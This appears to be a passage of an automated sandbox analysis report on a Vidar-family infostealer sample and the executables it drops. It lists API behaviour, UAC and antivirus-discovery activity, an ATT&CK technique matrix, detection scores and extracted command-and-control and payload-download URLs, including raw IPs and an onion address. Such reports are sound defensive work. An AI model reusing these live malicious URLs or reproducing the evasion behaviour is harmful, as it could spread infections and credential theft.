                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00401D20 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,12_2_00401D20
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040BC2F cpuid 12_2_0040BC2F
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: GetLocaleInfoA,12_2_0040D73D
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,15_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,15_2_009047D7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Queries volume information: C:\Users\user\Desktop\dl7WL77rkA.exe VolumeInformation
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe Code function: 12_2_0040824B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_0040824B
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,15_2_004143C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,15_2_004144B0
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe Code function: 12_2_004031E9 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,12_2_004031E9
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                  Stealing of Sensitive Information


                  Remote Access Functionality

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                  Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: 21 Windows Management Instrumentation; 21 Native API; 1 Shared Modules; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                  Persistence: 11 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Privilege Escalation: 1 DLL Side-Loading; 411 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Defense Evasion: 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 211 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 141 Virtualization/Sandbox Evasion; 411 Process Injection; 1 Rundll32; Stripped Payloads; Embedded Payloads
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 147 System Information Discovery; 1 Query Registry; 241 Security Software Discovery; 141 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                  Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                  Command and Control: 1 Web Service; 14 Ingress Tool Transfer; 21 Encrypted Channel; 11 Non-Standard Port; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; 1 Proxy; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                  Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
                  [Behavior graph: ID 1406292, Sample: dl7WL77rkA, Startdate: 11/03/2024, Architecture: WINDOWS, Score: 100]

                  | Source | Detection | Scanner | Label | Link |
                  | dl7WL77rkA.exe | 62% | ReversingLabs | Win64.Spyware.Vidar | |
                  | dl7WL77rkA.exe | 100% | Joe Sandbox ML | | |
                  | Source | Detection | Scanner | Label | Link |
                  | C:\Users\user\AppData\Local\Temp\syncUpd.exe | 100% | Avira | HEUR/AGEN.1316657 | |
                  | C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe | 100% | Avira | TR/Crypt.XPACK.Gen7 | |
                  | C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe | 100% | Avira | TR/Crypt.XPACK.Gen7 | |
                  | C:\Users\user\AppData\Local\Temp\syncUpd.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\AppData\Local\Temp\BroomSetup.exe | 75% | ReversingLabs | Win32.Trojan.Znyonm | |
                  | C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dll | 0% | ReversingLabs | | |
                  | C:\Users\user\AppData\Local\Temp\syncUpd.exe | 29% | ReversingLabs | | |
                  | C:\Users\user\AppData\Local\Temp\wfplwfs.exe | 47% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  | C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe | 58% | ReversingLabs | Win32.Trojan.RealProtect | |
                  No Antivirus matches
                                                                                                                                                                                                  http://www.google.com/feedfetcher.html)HKLMVT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://185.172.128.187/ping.php?substr=five-minuser-l1-1-0kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000753000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://blockchain.infoindexMVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-22VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                                                                                          http://sty.inkAddInProcess32.exe, 00000005.00000002.4510003590.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exeGAddInProcess32.exe, 00000005.00000002.4510003590.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://185.172.128.145/3cd2b41cbde8fc9c.php$ZsyncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://185.172.128.90/cpa/ping.php?substr=five&s=ab/SILENT/TOSTACK/NOCANCELgethttp://185.172.128.187kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700910460.0000000002D85000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4490727570.000000000069E000.00000004.00000020.00020000.00000000.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4501706269.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4480254087.0000000000412000.00000004.00000001.01000000.00000010.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4487258347.0000000002E66000.00000004.00000020.00020000.00000000.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4486682883.000000000091E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4485507430.0000000002D7E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4484255105.000000000076E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4483816947.0000000000412000.00000004.00000001.01000000.00000016.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4484686796.000000000083E000.00000004.00000020.00020000.00000000.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4485400126.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4483899417.0000000000412000.00000004.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                                  http://www.avantbrowser.com)MOT-V9mm/00.62VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://15.204.49.148/files/Amadey.exe4kFAddInProcess32.exe, 00000005.00000002.4510003590.000000000351B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://185.172.128.187/ping.php?substr=five1kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.000000000073D000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://185.172.128.145/15f649199f40275b/sqlite3.dll0XsyncUpd.exe, 0000000F.00000002.2758288970.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://localhost:3433/https://duniadekho.baridna:VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmptrue
                                                                                                                                                                                                                            http://search.msn.com/msnbot.htm)pkcs7:VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://185.172.128.90/cpa/ping.php?substr=five&s=abkDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000730000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4490727570.000000000069E000.00000004.00000020.00020000.00000000.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4501706269.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4480254087.0000000000412000.00000004.00000001.01000000.00000010.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4487258347.0000000002E66000.00000004.00000020.00020000.00000000.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4486682883.000000000091E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4485507430.0000000002D7E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4484255105.000000000076E000.00000004.00000020.00020000.00000000.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4483816947.0000000000412000.00000004.00000001.01000000.00000016.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4484686796.000000000083E000.00000004.00000020.00020000.00000000.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4485400126.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000002.4483899417.0000000000412000.00000004.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                                                http://www.alexa.com/help/webmasters;VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                                                                                                                                  https://pastebin.comAddInProcess32.exe, 00000005.00000002.4510003590.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000351B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003314000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003310000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003406000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://grabify.org/llCGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://lawyerbuyer.orgAddInProcess32.exe, 00000005.00000002.4510003590.000000000312D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://dumppage.orgUUIDPGDSEpMVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C016000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://namemail.org/6779d89b7a368f4f3f340b50a9d18d71.exe=AddInProcess32.exe, 00000005.00000002.4510003590.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://sty.ink/ppg8xHAddInProcess32.exe, 00000005.00000002.4510003590.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exe4kFAddInProcess32.exe, 00000005.00000002.4510003590.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000318F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                http://185.172.128.145/3cd2b41cbde8fc9c.phpinit.exesyncUpd.exe, 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                                                                                                                  https://namemail.org/6779d89b7a368f4f3f340b50a9d18d71.exe6AddInProcess32.exe, 00000005.00000002.4510003590.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    http://185.172.128.126AddInProcess32.exe, 00000005.00000002.4510003590.000000000350F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://shortiny.comAddInProcess32.exe, 00000005.00000002.4510003590.000000000366D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        http://185.172.128.145/15f649199f40275b/sqlite3.dll_syncUpd.exe, 0000000F.00000002.2758288970.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
